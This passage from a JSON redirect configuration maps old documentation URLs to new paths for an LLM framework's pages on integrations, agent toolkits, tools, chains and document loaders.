"/en/latest/integrations/qdrant.html", "destination": "/docs/integrations/providers/qdrant" }, { "source": "/docs/integrations/qdrant", "destination": "/docs/integrations/providers/qdrant" }, { "source": "/en/latest/integrations/ray_serve.html", "destination": "/docs/integrations/providers/ray_serve" }, { "source": "/docs/integrations/ray_serve", "destination": "/docs/integrations/providers/ray_serve" }, { "source": "/en/latest/integrations/rebuff.html", "destination": 
"/docs/integrations/providers/rebuff" }, { "source": "/docs/integrations/rebuff", "destination": "/docs/integrations/providers/rebuff" }, { "source": "/en/latest/integrations/reddit.html", "destination": "/docs/integrations/providers/reddit" }, { "source": "/docs/integrations/reddit", "destination": "/docs/integrations/providers/reddit" }, { "source": "/en/latest/integrations/redis.html", "destination": "/docs/integrations/providers/redis" }, { "source": "/docs/integrations/redis", "destination": "/docs/integrations/providers/redis" }, { "source": "/en/latest/integrations/replicate.html", "destination": "/docs/integrations/providers/replicate" }, { "source": "/docs/integrations/replicate", "destination": "/docs/integrations/providers/replicate" }, { "source": "/en/latest/integrations/roam.html", "destination": "/docs/integrations/providers/roam" }, { "source": "/docs/integrations/roam", "destination": "/docs/integrations/providers/roam" }, { "source": "/en/latest/integrations/runhouse.html", "destination": "/docs/integrations/providers/runhouse" }, { "source": "/docs/integrations/runhouse", "destination": "/docs/integrations/providers/runhouse" }, { "source": "/en/latest/integrations/rwkv.html", "destination": "/docs/integrations/providers/rwkv" }, { "source": "/docs/integrations/rwkv", "destination": "/docs/integrations/providers/rwkv" }, { "source": "/en/latest/integrations/sagemaker_endpoint.html", "destination": "/docs/integrations/providers/sagemaker_endpoint" }, { "source": "/docs/integrations/sagemaker_endpoint", "destination": "/docs/integrations/providers/sagemaker_endpoint" }, { "source": "/en/latest/integrations/searx.html", "destination": "/docs/integrations/providers/searx" }, { "source": "/docs/integrations/searx", "destination": "/docs/integrations/providers/searx" }, { "source": "/en/latest/integrations/serpapi.html", "destination": "/docs/integrations/providers/serpapi" }, { "source": "/docs/integrations/serpapi", "destination": "/docs/integrations/providers/serpapi" }, { "source": "/en/latest/integrations/shaleprotocol.html", "destination": "/docs/integrations/providers/shaleprotocol" }, { "source": "/docs/integrations/shaleprotocol", "destination": "/docs/integrations/providers/shaleprotocol" }, { "source": "/en/latest/integrations/sklearn.html", "destination": "/docs/integrations/providers/sklearn" }, { "source": "/docs/integrations/sklearn", "destination": "/docs/integrations/providers/sklearn" }, { "source": "/en/latest/integrations/slack.html", "destination": "/docs/integrations/providers/slack" }, { "source": "/docs/integrations/slack", "destination": "/docs/integrations/providers/slack" }, { "source": "/en/latest/integrations/spacy.html", "destination": "/docs/integrations/providers/spacy" }, { "source": "/docs/integrations/spacy", "destination": "/docs/integrations/providers/spacy" }, { "source": "/en/latest/integrations/spreedly.html", "destination": "/docs/integrations/providers/spreedly" }, { "source": "/docs/integrations/spreedly", "destination": "/docs/integrations/providers/spreedly" }, { "source": "/en/latest/integrations/stochasticai.html", "destination": "/docs/integrations/providers/stochasticai" }, { "source": "/docs/integrations/stochasticai", "destination": "/docs/integrations/providers/stochasticai" }, { "source": "/en/latest/integrations/stripe.html", "destination": "/docs/integrations/providers/stripe" }, { "source": "/docs/integrations/stripe", "destination": "/docs/integrations/providers/stripe" }, { "source": "/en/latest/integrations/tair.html", 
"destination": "/docs/integrations/providers/tair" }, { "source": "/docs/integrations/tair", "destination": "/docs/integrations/providers/tair" }, { "source": "/en/latest/integrations/telegram.html", "destination": "/docs/integrations/providers/telegram" }, { "source": "/docs/integrations/telegram", "destination": "/docs/integrations/providers/telegram" }, { "source": "/en/latest/integrations/tomarkdown.html", "destination": "/docs/integrations/providers/tomarkdown" }, { "source": "/docs/integrations/tomarkdown", "destination": "/docs/integrations/providers/tomarkdown" }, { "source": "/en/latest/integrations/trello.html", "destination": "/docs/integrations/providers/trello" }, { "source": "/docs/integrations/trello", "destination": "/docs/integrations/providers/trello" }, { "source": "/en/latest/integrations/twitter.html", "destination": "/docs/integrations/providers/twitter" }, { "source": "/docs/integrations/twitter", "destination": "/docs/integrations/providers/twitter" }, { "source": "/en/latest/integrations/unstructured.html", "destination": "/docs/integrations/providers/unstructured" }, { "source": "/docs/integrations/unstructured", "destination": "/docs/integrations/providers/unstructured" }, { "source": "/en/latest/integrations/vectara/vectara_chat.html", "destination": "/docs/integrations/providers/vectara_chat" }, { "source": "/docs/integrations/vectara/vectara_chat", "destination": "/docs/integrations/providers/vectara_chat" }, { "source": "/en/latest/integrations/vectara/vectara_text_generation.html", "destination": "/docs/integrations/providers/vectara_text_generation" }, { "source": "/docs/integrations/vectara/vectara_text_generation", "destination": "/docs/integrations/providers/vectara_text_generation" }, { "source": "/en/latest/integrations/vespa.html", "destination": "/docs/integrations/providers/vespa" }, { "source": "/docs/integrations/vespa", "destination": "/docs/integrations/providers/vespa" }, { "source": "/en/latest/integrations/wandb_tracking.html", "destination": "/docs/integrations/providers/wandb_tracking" }, { "source": "/docs/integrations/wandb_tracking", "destination": "/docs/integrations/providers/wandb_tracking" }, { "source": "/en/latest/integrations/weather.html", "destination": "/docs/integrations/providers/weather" }, { "source": "/docs/integrations/weather", "destination": "/docs/integrations/providers/weather" }, { "source": "/en/latest/integrations/weaviate.html", "destination": "/docs/integrations/providers/weaviate" }, { "source": "/docs/integrations/weaviate", "destination": "/docs/integrations/providers/weaviate" }, { "source": "/en/latest/integrations/whatsapp.html", "destination": "/docs/integrations/providers/whatsapp" }, { "source": "/docs/integrations/whatsapp", "destination": "/docs/integrations/providers/whatsapp" }, { "source": "/en/latest/integrations/whylabs_profiling.html", "destination": "/docs/integrations/providers/whylabs_profiling" }, { "source": "/docs/integrations/whylabs_profiling", "destination": "/docs/integrations/providers/whylabs_profiling" }, { "source": "/en/latest/integrations/wikipedia.html", "destination": "/docs/integrations/providers/wikipedia" }, { "source": "/docs/integrations/wikipedia", "destination": "/docs/integrations/providers/wikipedia" }, { "source": "/en/latest/integrations/wolfram_alpha.html", "destination": "/docs/integrations/providers/wolfram_alpha" }, { "source": "/docs/integrations/wolfram_alpha", "destination": "/docs/integrations/providers/wolfram_alpha" }, { "source": 
"/en/latest/integrations/writer.html", "destination": "/docs/integrations/providers/writer" }, { "source": "/docs/integrations/writer", "destination": "/docs/integrations/providers/writer" }, { "source": "/en/latest/integrations/yeagerai.html", "destination": "/docs/integrations/providers/yeagerai" }, { "source": "/docs/integrations/yeagerai", "destination": "/docs/integrations/providers/yeagerai" }, { "source": "/en/latest/integrations/youtube.html", "destination": "/docs/integrations/providers/youtube" }, { "source": "/docs/integrations/youtube", "destination": "/docs/integrations/providers/youtube" }, { "source": "/en/latest/integrations/zep.html", "destination": "/docs/integrations/providers/zep" }, { "source": "/docs/integrations/zep", "destination": "/docs/integrations/providers/zep" }, { "source": "/en/latest/integrations/zilliz.html", "destination": "/docs/integrations/providers/zilliz" }, { "source": "/docs/integrations/zilliz", "destination": "/docs/integrations/providers/zilliz" }, { "source": "/docs/ecosystem/integrations/", "destination": "/docs/integrations/" }, { "source": "/docs/ecosystem/integrations/:path*", "destination": "/docs/integrations/providers/:path*" }, { "source": "/en/latest/ecosystem/deployments.html", "destination": "/docs/guides/deployments/template_repos" }, { "source": "/en/latest/use_cases/evaluation/agent_benchmarking.html", "destination": "/docs/guides/evaluation/agent_benchmarking" }, { "source": "/en/latest/use_cases/evaluation/agent_vectordb_sota_pg.html", "destination": "/docs/guides/evaluation/agent_vectordb_sota_pg" }, { "source": "/en/latest/use_cases/evaluation/benchmarking_template.html", "destination": "/docs/guides/evaluation/benchmarking_template" }, { "source": "/en/latest/use_cases/evaluation/data_augmented_question_answering.html", "destination": "/docs/guides/evaluation/data_augmented_question_answering" }, { "source": "/en/latest/use_cases/evaluation/generic_agent_evaluation.html", "destination": "/docs/guides/evaluation/generic_agent_evaluation" }, { "source": "/en/latest/use_cases/evaluation/huggingface_datasets.html", "destination": "/docs/guides/evaluation/huggingface_datasets" }, { "source": "/en/latest/use_cases/evaluation/llm_math.html", "destination": "/docs/guides/evaluation/llm_math" }, { "source": "/en/latest/use_cases/evaluation/openapi_eval.html", "destination": "/docs/guides/evaluation/openapi_eval" }, { "source": "/en/latest/use_cases/evaluation/qa_benchmarking_pg.html", "destination": "/docs/guides/evaluation/qa_benchmarking_pg" }, { "source": "/en/latest/use_cases/evaluation/qa_benchmarking_sota.html", "destination": "/docs/guides/evaluation/qa_benchmarking_sota" }, { "source": "/en/latest/use_cases/evaluation/qa_generation.html", "destination": "/docs/guides/evaluation/qa_generation" }, { "source": "/en/latest/use_cases/evaluation/question_answering.html", "destination": "/docs/guides/evaluation/question_answering" }, { "source": "/en/latest/use_cases/evaluation/sql_qa_benchmarking_chinook.html", "destination": "/docs/guides/evaluation/sql_qa_benchmarking_chinook" }, { "source": "/en/latest/additional_resources/model_laboratory.html", "destination": "/docs/guides/model_laboratory" }, { "source": "/en/latest/modules/agents/agents/examples/openai_functions_agent.html", "destination": "/docs/modules/agents/agent_types/openai_functions_agent" }, { "source": "/en/latest/modules/agents/agents/examples/react.html", "destination": "/docs/modules/agents/agent_types/react_docstore" }, { "source": 
"/en/latest/modules/agents/agents/examples/self_ask_with_search.html", "destination": "/docs/modules/agents/agent_types/self_ask_with_search" }, { "source": "/en/latest/modules/agents/agent_executors/examples/agent_vectorstore.html", "destination": "/docs/modules/agents/how_to/agent_vectorstore" }, { "source": "/en/latest/modules/agents/agent_executors/examples/async_agent.html", "destination": "/docs/modules/agents/how_to/async_agent" }, { "source": "/en/latest/modules/agents/agent_executors/examples/chatgpt_clone.html", "destination": "/docs/modules/agents/how_to/chatgpt_clone" }, { "source": "/en/latest/modules/agents/agents/custom_agent.html", "destination": "/docs/modules/agents/how_to/custom_agent" }, { "source": "/en/latest/modules/agents/agents/custom_agent_with_tool_retrieval.html", "destination": "/docs/modules/agents/how_to/custom_agent_with_tool_retrieval" }, { "source": "/en/latest/modules/agents/agents/custom_mrkl_agent.html", "destination": "/docs/modules/agents/how_to/custom_mrkl_agent" }, { "source": "/en/latest/modules/agents/agents/custom_multi_action_agent.html", "destination": "/docs/modules/agents/how_to/custom_multi_action_agent" }, { "source": "/en/latest/modules/agents/agent_executors/examples/handle_parsing_errors.html", "destination": "/docs/modules/agents/how_to/handle_parsing_errors" }, { "source": "/en/latest/modules/agents/agent_executors/examples/intermediate_steps.html", "destination": "/docs/modules/agents/how_to/intermediate_steps" }, { "source": "/en/latest/modules/agents/agent_executors/examples/max_iterations.html", "destination": "/docs/modules/agents/how_to/max_iterations" }, { "source": "/en/latest/modules/agents/agent_executors/examples/max_time_limit.html", "destination": "/docs/modules/agents/how_to/max_time_limit" }, { "source": "/en/latest/modules/agents/agent_executors/examples/sharedmemory_for_tools.html", "destination": "/docs/modules/agents/how_to/sharedmemory_for_tools" }, { "source": "/en/latest/modules/agents/streaming_stdout_final_only.html", "destination": "/docs/modules/agents/how_to/streaming_stdout_final_only" }, { "source": "/en/latest/modules/agents/toolkits/examples/azure_cognitive_services.html", "destination": "/docs/integrations/toolkits/azure_cognitive_services" }, { "source": "/docs/modules/agents/toolkits/azure_cognitive_services", "destination": "/docs/integrations/toolkits/azure_cognitive_services" }, { "source": "/en/latest/modules/agents/toolkits/examples/csv.html", "destination": "/docs/integrations/toolkits/csv" }, { "source": "/docs/modules/agents/toolkits/csv", "destination": "/docs/integrations/toolkits/csv" }, { "source": "/en/latest/modules/agents/toolkits/examples/gmail.html", "destination": "/docs/integrations/toolkits/gmail" }, { "source": "/docs/modules/agents/toolkits/gmail", "destination": "/docs/integrations/toolkits/gmail" }, { "source": "/en/latest/modules/agents/toolkits/examples/jira.html", "destination": "/docs/integrations/toolkits/jira" }, { "source": "/docs/modules/agents/toolkits/jira", "destination": "/docs/integrations/toolkits/jira" }, { "source": "/en/latest/modules/agents/toolkits/examples/json.html", "destination": "/docs/integrations/toolkits/json" }, { "source": "/docs/modules/agents/toolkits/json", "destination": "/docs/integrations/toolkits/json" }, { "source": "/en/latest/modules/agents/toolkits/examples/openapi.html", "destination": "/docs/integrations/toolkits/openapi" }, { "source": "/docs/modules/agents/toolkits/openapi", "destination": "/docs/integrations/toolkits/openapi" }, { 
"source": "/en/latest/modules/agents/toolkits/examples/openapi_nla.html", "destination": "/docs/integrations/toolkits/openapi_nla" }, { "source": "/docs/modules/agents/toolkits/openapi_nla", "destination": "/docs/integrations/toolkits/openapi_nla" }, { "source": "/en/latest/modules/agents/toolkits/examples/pandas.html", "destination": "/docs/integrations/toolkits/pandas" }, { "source": "/docs/modules/agents/toolkits/pandas", "destination": "/docs/integrations/toolkits/pandas" }, { "source": "/en/latest/modules/agents/toolkits/examples/playwright.html", "destination": "/docs/integrations/toolkits/playwright" }, { "source": "/docs/modules/agents/toolkits/playwright", "destination": "/docs/integrations/toolkits/playwright" }, { "source": "/en/latest/modules/agents/toolkits/examples/powerbi.html", "destination": "/docs/integrations/toolkits/powerbi" }, { "source": "/docs/modules/agents/toolkits/powerbi", "destination": "/docs/integrations/toolkits/powerbi" }, { "source": "/en/latest/modules/agents/toolkits/examples/python.html", "destination": "/docs/integrations/toolkits/python" }, { "source": "/docs/modules/agents/toolkits/python", "destination": "/docs/integrations/toolkits/python" }, { "source": "/en/latest/modules/agents/toolkits/examples/spark.html", "destination": "/docs/integrations/toolkits/spark" }, { "source": "/docs/modules/agents/toolkits/spark", "destination": "/docs/integrations/toolkits/spark" }, { "source": "/en/latest/modules/agents/toolkits/examples/spark_sql.html", "destination": "/docs/integrations/toolkits/spark_sql" }, { "source": "/docs/modules/agents/toolkits/spark_sql", "destination": "/docs/integrations/toolkits/spark_sql" }, { "source": "/en/latest/modules/agents/toolkits/examples/sql_database.html", "destination": "/docs/integrations/toolkits/sql_database" }, { "source": "/docs/modules/agents/toolkits/sql_database", "destination": "/docs/integrations/toolkits/sql_database" }, { "source": "/en/latest/modules/agents/toolkits/examples/vectorstore.html", "destination": "/docs/integrations/toolkits/vectorstore" }, { "source": "/docs/modules/agents/toolkits/vectorstore", "destination": "/docs/integrations/toolkits/vectorstore" }, { "source": "/docs/modules/agents/toolkits/amadeus", "destination": "/docs/integrations/toolkits/amadeus" }, { "source": "/docs/modules/agents/toolkits/github", "destination": "/docs/integrations/toolkits/github" }, { "source": "/docs/modules/agents/toolkits/multion", "destination": "/docs/integrations/toolkits/multion" }, { "source": "/en/latest/modules/agents/tools/custom_tools.html", "destination": "/docs/modules/agents/tools/how_to/custom_tools" }, { "source": "/en/latest/modules/agents/tools/human_approval.html", "destination": "/docs/modules/agents/tools/how_to/human_approval" }, { "source": "/en/latest/modules/agents/tools/multi_input_tool.html", "destination": "/docs/modules/agents/tools/how_to/multi_input_tool" }, { "source": "/en/latest/modules/agents/tools/tool_input_validation.html", "destination": "/docs/modules/agents/tools/how_to/tool_input_validation" }, { "source": "/en/latest/modules/agents/tools/tools_as_openai_functions.html", "destination": "/docs/modules/agents/tools/how_to/tools_as_openai_functions" }, { "source": "/en/latest/modules/agents/tools/examples/apify.html", "destination": "/docs/integrations/tools/apify" }, { "source": "/docs/modules/agents/tools/integrations/apify", "destination": "/docs/integrations/tools/apify" }, { "source": "/en/latest/modules/agents/tools/examples/arxiv.html", "destination": 
"/docs/integrations/tools/arxiv" }, { "source": "/docs/modules/agents/tools/integrations/arxiv", "destination": "/docs/integrations/tools/arxiv" }, { "source": "/en/latest/modules/agents/tools/examples/awslambda.html", "destination": "/docs/integrations/tools/awslambda" }, { "source": "/docs/modules/agents/tools/integrations/awslambda", "destination": "/docs/integrations/tools/awslambda" }, { "source": "/en/latest/modules/agents/tools/examples/bing_search.html", "destination": "/docs/integrations/tools/bing_search" }, { "source": "/docs/modules/agents/tools/integrations/bing_search", "destination": "/docs/integrations/tools/bing_search" }, { "source": "/en/latest/modules/agents/tools/examples/brave_search.html", "destination": "/docs/integrations/tools/brave_search" }, { "source": "/docs/modules/agents/tools/integrations/brave_search", "destination": "/docs/integrations/tools/brave_search" }, { "source": "/en/latest/modules/agents/tools/examples/chatgpt_plugins.html", "destination": "/docs/integrations/tools/chatgpt_plugins" }, { "source": "/docs/modules/agents/tools/integrations/chatgpt_plugins", "destination": "/docs/integrations/tools/chatgpt_plugins" }, { "source": "/en/latest/modules/agents/tools/examples/ddg.html", "destination": "/docs/integrations/tools/ddg" }, { "source": "/docs/modules/agents/tools/integrations/ddg", "destination": "/docs/integrations/tools/ddg" }, { "source": "/en/latest/modules/agents/tools/examples/filesystem.html", "destination": "/docs/integrations/tools/filesystem" }, { "source": "/docs/modules/agents/tools/integrations/filesystem", "destination": "/docs/integrations/tools/filesystem" }, { "source": "/en/latest/modules/agents/tools/examples/google_places.html", "destination": "/docs/integrations/tools/google_places" }, { "source": "/docs/modules/agents/tools/integrations/google_places", "destination": "/docs/integrations/tools/google_places" }, { "source": "/en/latest/modules/agents/tools/examples/google_search.html", "destination": "/docs/integrations/tools/google_search" }, { "source": "/docs/modules/agents/tools/integrations/google_search", "destination": "/docs/integrations/tools/google_search" }, { "source": "/en/latest/modules/agents/tools/examples/google_serper.html", "destination": "/docs/integrations/tools/google_serper" }, { "source": "/docs/modules/agents/tools/integrations/google_serper", "destination": "/docs/integrations/tools/google_serper" }, { "source": "/en/latest/modules/agents/tools/examples/gradio_tools.html", "destination": "/docs/integrations/tools/gradio_tools" }, { "source": "/docs/modules/agents/tools/integrations/gradio_tools", "destination": "/docs/integrations/tools/gradio_tools" }, { "source": "/en/latest/modules/agents/tools/examples/graphql.html", "destination": "/docs/integrations/tools/graphql" }, { "source": "/docs/modules/agents/tools/integrations/graphql", "destination": "/docs/integrations/tools/graphql" }, { "source": "/en/latest/modules/agents/tools/examples/huggingface_tools.html", "destination": "/docs/integrations/tools/huggingface_tools" }, { "source": "/docs/modules/agents/tools/integrations/huggingface_tools", "destination": "/docs/integrations/tools/huggingface_tools" }, { "source": "/en/latest/modules/agents/tools/examples/human_tools.html", "destination": "/docs/integrations/tools/human_tools" }, { "source": "/docs/modules/agents/tools/integrations/human_tools", "destination": "/docs/integrations/tools/human_tools" }, { "source": "/en/latest/modules/agents/tools/examples/ifttt.html", "destination": 
"/docs/integrations/tools/ifttt" }, { "source": "/docs/modules/agents/tools/integrations/ifttt", "destination": "/docs/integrations/tools/ifttt" }, { "source": "/en/latest/modules/agents/tools/examples/metaphor_search.html", "destination": "/docs/integrations/tools/metaphor_search" }, { "source": "/docs/modules/agents/tools/integrations/metaphor_search", "destination": "/docs/integrations/tools/metaphor_search" }, { "source": "/en/latest/modules/agents/tools/examples/openweathermap.html", "destination": "/docs/integrations/tools/openweathermap" }, { "source": "/docs/modules/agents/tools/integrations/openweathermap", "destination": "/docs/integrations/tools/openweathermap" }, { "source": "/en/latest/modules/agents/tools/examples/pubmed.html", "destination": "/docs/integrations/tools/pubmed" }, { "source": "/docs/modules/agents/tools/integrations/pubmed", "destination": "/docs/integrations/tools/pubmed" }, { "source": "/en/latest/modules/agents/tools/examples/requests.html", "destination": "/docs/integrations/tools/requests" }, { "source": "/docs/modules/agents/tools/integrations/requests", "destination": "/docs/integrations/tools/requests" }, { "source": "/en/latest/modules/agents/tools/examples/sceneXplain.html", "destination": "/docs/integrations/tools/sceneXplain" }, { "source": "/docs/modules/agents/tools/integrations/sceneXplain", "destination": "/docs/integrations/tools/sceneXplain" }, { "source": "/en/latest/modules/agents/tools/examples/search_tools.html", "destination": "/docs/integrations/tools/search_tools" }, { "source": "/docs/modules/agents/tools/integrations/search_tools", "destination": "/docs/integrations/tools/search_tools" }, { "source": "/en/latest/modules/agents/tools/examples/searx_search.html", "destination": "/docs/integrations/tools/searx_search" }, { "source": "/docs/modules/agents/tools/integrations/searx_search", "destination": "/docs/integrations/tools/searx_search" }, { "source": "/en/latest/modules/agents/tools/examples/serpapi.html", "destination": "/docs/integrations/tools/serpapi" }, { "source": "/docs/modules/agents/tools/integrations/serpapi", "destination": "/docs/integrations/tools/serpapi" }, { "source": "/en/latest/modules/agents/tools/examples/twilio.html", "destination": "/docs/integrations/tools/twilio" }, { "source": "/docs/modules/agents/tools/integrations/twilio", "destination": "/docs/integrations/tools/twilio" }, { "source": "/en/latest/modules/agents/tools/examples/wikipedia.html", "destination": "/docs/integrations/tools/wikipedia" }, { "source": "/docs/modules/agents/tools/integrations/wikipedia", "destination": "/docs/integrations/tools/wikipedia" }, { "source": "/en/latest/modules/agents/tools/examples/wolfram_alpha.html", "destination": "/docs/integrations/tools/wolfram_alpha" }, { "source": "/docs/modules/agents/tools/integrations/wolfram_alpha", "destination": "/docs/integrations/tools/wolfram_alpha" }, { "source": "/en/latest/modules/agents/tools/examples/youtube.html", "destination": "/docs/integrations/tools/youtube" }, { "source": "/docs/modules/agents/tools/integrations/youtube", "destination": "/docs/integrations/tools/youtube" }, { "source": "/en/latest/modules/agents/tools/examples/zapier.html", "destination": "/docs/integrations/tools/zapier" }, { "source": "/docs/modules/agents/tools/integrations/zapier", "destination": "/docs/integrations/tools/zapier" }, { "source": "/en/latest/modules/callbacks/filecallbackhandler.html", "destination": "/docs/modules/callbacks/how_to/filecallbackhandler" }, { "source": 
"/en/latest/modules/callbacks/examples/argilla.html", "destination": "/docs/integrations/callbacks/argilla" }, { "source": "/docs/modules/callbacks/integrations/argilla", "destination": "/docs/integrations/callbacks/argilla" }, { "source": "/en/latest/modules/chains/examples/extraction.html", "destination": "/docs/modules/chains/additional/extraction" }, { "source": "/en/latest/modules/chains/examples/flare.html", "destination": "/docs/use_cases/question_answering/how_to/flare" }, { "source": "/en/latest/modules/chains/examples/graph_cypher_qa.html", "destination": "/docs/use_cases/graph/graph_cypher_qa" }, { "source": "/en/latest/modules/chains/examples/graph_nebula_qa.html", "destination": "/docs/use_cases/graph/graph_nebula_qa" }, { "source": "/en/latest/modules/chains/index_examples/graph_qa.html", "destination": "/docs/use_cases/graph/graph_qa" }, { "source": "/en/latest/modules/chains/index_examples/hyde.html", "destination": "/docs/use_cases/question_answering/how_to/hyde" }, { "source": "/en/latest/modules/chains/examples/llm_bash.html", "destination": "/docs/use_cases/code_writing/llm_bash" }, { "source": "/en/latest/modules/chains/examples/llm_checker.html", "destination": "/docs/use_cases/self_check/llm_checker" }, { "source": "/en/latest/modules/chains/examples/llm_math.html", "destination": "/docs/use_cases/code_writing/llm_math" }, { "source": "/en/latest/modules/chains/examples/llm_requests.html", "destination": "/docs/use_cases/apis/llm_requests" }, { "source": "/en/latest/modules/chains/examples/llm_summarization_checker.html", "destination": "/docs/use_cases/self_check/llm_summarization_checker" }, { "source": "/en/latest/modules/chains/examples/openapi.html", "destination": "/docs/use_cases/apis/openapi" }, { "source": "/en/latest/modules/chains/examples/pal.html", "destination": "/docs/use_cases/code_writing/pal" }, { "source": "/en/latest/modules/chains/examples/tagging.html", "destination": "/docs/use_cases/tagging" }, { "source": "/en/latest/modules/chains/index_examples/vector_db_text_generation.html", "destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation" }, { "source": "/en/latest/modules/chains/generic/router.html", "destination": "/docs/modules/chains/foundational/router" }, { "source": "/en/latest/modules/chains/generic/transformation.html", "destination": "/docs/modules/chains/foundational/transformation" }, { "source": "/en/latest/modules/chains/generic/async_chain.html", "destination": "/docs/modules/chains/how_to/async_chain" }, { "source": "/en/latest/modules/chains/generic/custom_chain.html", "destination": "/docs/modules/chains/how_to/custom_chain" }, { "source": "/en/latest/modules/chains/generic/from_hub.html", "destination": "/docs/modules/chains/how_to/from_hub" }, { "source": "/en/latest/modules/chains/generic/serialization.html", "destination": "/docs/modules/chains/how_to/serialization" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/acreom.html", "destination": "/docs/integrations/document_loaders/acreom" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/acreom", "destination": "/docs/integrations/document_loaders/acreom" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/airbyte_json.html", "destination": "/docs/integrations/document_loaders/airbyte_json" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/airbyte_json", "destination": "/docs/integrations/document_loaders/airbyte_json" }, { "source": 
"/en/latest/modules/indexes/document_loaders/examples/airtable.html", "destination": "/docs/integrations/document_loaders/airtable" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/airtable", "destination": "/docs/integrations/document_loaders/airtable" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/alibaba_cloud_maxcompute.html", "destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/alibaba_cloud_maxcompute", "destination": "/docs/integrations/document_loaders/alibaba_cloud_maxcompute" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/apify_dataset.html", "destination": "/docs/integrations/document_loaders/apify_dataset" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/apify_dataset", "destination": "/docs/integrations/document_loaders/apify_dataset" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/arxiv.html", "destination": "/docs/integrations/document_loaders/arxiv" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/arxiv", "destination": "/docs/integrations/document_loaders/arxiv" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_directory.html", "destination": "/docs/integrations/document_loaders/aws_s3_directory" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_directory", "destination": "/docs/integrations/document_loaders/aws_s3_directory" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/aws_s3_file.html", "destination": "/docs/integrations/document_loaders/aws_s3_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/aws_s3_file", "destination": "/docs/integrations/document_loaders/aws_s3_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azlyrics.html", "destination": "/docs/integrations/document_loaders/azlyrics" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azlyrics", "destination": "/docs/integrations/document_loaders/azlyrics" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_container.html", "destination": "/docs/integrations/document_loaders/azure_blob_storage_container" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_container", "destination": "/docs/integrations/document_loaders/azure_blob_storage_container" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/azure_blob_storage_file.html", "destination": "/docs/integrations/document_loaders/azure_blob_storage_file" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/azure_blob_storage_file", "destination": "/docs/integrations/document_loaders/azure_blob_storage_file" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/bibtex.html", "destination": "/docs/integrations/document_loaders/bibtex" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/bibtex", "destination": "/docs/integrations/document_loaders/bibtex" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/bilibili.html", "destination": "/docs/integrations/document_loaders/bilibili" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/bilibili", "destination": "/docs/integrations/document_loaders/bilibili" }, { "source": 
"/en/latest/modules/indexes/document_loaders/examples/blackboard.html", "destination": "/docs/integrations/document_loaders/blackboard" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/blackboard", "destination": "/docs/integrations/document_loaders/blackboard" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/blockchain.html", "destination": "/docs/integrations/document_loaders/blockchain" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/blockchain", "destination": "/docs/integrations/document_loaders/blockchain" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/chatgpt_loader.html", "destination": "/docs/integrations/document_loaders/chatgpt_loader" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/chatgpt_loader", "destination": "/docs/integrations/document_loaders/chatgpt_loader" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/college_confidential.html", "destination": "/docs/integrations/document_loaders/college_confidential" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/college_confidential", "destination": "/docs/integrations/document_loaders/college_confidential" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/confluence.html", "destination": "/docs/integrations/document_loaders/confluence" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/confluence", "destination": "/docs/integrations/document_loaders/confluence" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/conll-u.html", "destination": "/docs/integrations/document_loaders/conll-u" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/conll-u", "destination": "/docs/integrations/document_loaders/conll-u" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/copypaste.html", "destination": "/docs/integrations/document_loaders/copypaste" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/copypaste", "destination": "/docs/integrations/document_loaders/copypaste" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/csv.html", "destination": "/docs/integrations/document_loaders/csv" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/csv", "destination": "/docs/integrations/document_loaders/csv" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/diffbot.html", "destination": "/docs/integrations/document_loaders/diffbot" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/diffbot", "destination": "/docs/integrations/document_loaders/diffbot" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/discord.html", "destination": "/docs/integrations/document_loaders/discord" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/discord", "destination": "/docs/integrations/document_loaders/discord" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/docugami.html", "destination": "/docs/integrations/document_loaders/docugami" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/docugami", "destination": "/docs/integrations/document_loaders/docugami" }, { "source": "/en/latest/modules/indexes/document_loaders/examples/duckdb.html", "destination": "/docs/integrations/document_loaders/duckdb" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/duckdb", "destination": 
